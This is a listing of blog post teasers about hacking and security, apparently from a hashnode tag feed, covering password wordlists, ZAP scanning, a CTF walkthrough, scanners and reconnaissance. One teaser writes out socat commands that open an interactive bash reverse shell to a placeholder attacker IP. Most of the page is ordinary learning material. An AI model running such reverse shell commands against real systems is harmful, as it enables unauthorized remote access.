Hacker22saimonch16-blog.hashnode.dev·Oct 29, 2024Dictionary Generator V1.0Generador de Diccionarios de Contraseñas Personalizadas Hoy les comparto una herramienta que he creado y publicado en GitHub: un Generador de Diccionarios de Contraseñas. Este script en Python permite crear diccionarios personalizados utilizando info...Discusshacking
Krzysztof Kałamarskikkalamarski.me·Oct 17, 2024Automate Your Web Security: Mastering Authenticated ZAP Scans with the ZAP Automation FrameworkAs developers, we strive to deliver secure systems to our clients. However, with large applications and hundreds of potential vulnerabilities and attacks, performing manual security testing for each new release can be a daunting task. Fortunately, th...Discusszap
Nexxsysnexxium.hashnode.dev·Oct 16, 2024Using SOCAT to upgrade reverse shellTo upgrade your reverse shell you can use various methods: SOCAT # Attacker: socat TCP-L:<port> - # Victim: socat TCP:<attacker-ip>:<attacker-port> EXEC:"bash -li",pty,stderr,sigint,setsid,sane References: https://www.101labs.net/comptia-secu...Discusshacking tools
frogtheripperfrogtheripper.hashnode.dev·Sep 30, 2024Maquina VulnvaultNombre de la Máquina: Vulnvault Sistema Operativo: Linux Dificultad: Fácil Plataforma: DockerLabs Dirección IP: 172.17.0.2 Escaneo de puertos Empezamos escaneando los puertos disponibles en la maquina: sudo nmap -sS -p- --open -T5 -n -Pn -v 172...Discuss·33 readshacking tools
Trix Cyruswaymap-web-vulnerability-scanner.hashnode.dev·Sep 29, 2024Waymap - Web Application Vulnerability Scanner ToolWaymap - Web Vulnerability Scanner Tool url - https://github.com/TrixSec/waymap Current Version: 1.1.1 Author: Trix Cyrus What is Waymap? Waymap is a fast and optimized web vulnerability scanner designed for penetration testers. It effectively identi...Discuss·1 likehacking
Retr0retr0x.hashnode.dev·Aug 12, 2024New Reconnaissance Methodologies/Tools for Bug Bounty Hunting & Ethical Hacking 💥💥Welcome Readers!! With new methodologies constantly emerging in the field of ethical hacking and bug bounty hunting, it's essential to explore the latest and most effective techniques. In this blog, we'll delve into some of the most innovative and t...Discuss·33 readssundomain enumeration
Infraboyinfraboy.hashnode.dev·Jun 18, 2024Introduction to Ethical Hacking: Getting StartedWhat is Hacking? Hacking refers to the practice of exploiting weaknesses or vulnerabilities in computer systems, networks, or applications to gain unauthorized access, control, or information. While the term "hacking" often carries a negative connota...DiscussCertified Ethical Hacker ( CEH )Ethical Hacking
YSsymbolexe.xyz·Apr 24, 2024ToolVerse ToolkitToolVerse ToolVerse is a versatile and user-friendly tool designed to simplify the installation process of various cybersecurity and hacking tools on Linux systems, particularly tailored for Kali Linux and similar distributions. https://GitHub.com/Sy...Discuss#cybersecurity
Prasun Rayprasunray477.hashnode.dev·Apr 10, 2024The Bug Bounty ChroniclesIntroduction to web servers, web applications, and their configurations. What is a "Web Server"A web server is the core software/hardware that stores websites and facilitates the client-server communication required to view web pages over the interne...Discuss·11 likes·30 readsbugbounty
Devashis Naugaindevashisnaugain.hashnode.dev·Mar 5, 2024Rush To ReconIn this blog, we will learn about the fundamentals of reconnaissance, what it is, how to perform reconnaissance on your target, how many types are there, and what are the latest tools we can use today to make our reconnaissance a lot easier. So let's...Discuss·43 readscyber security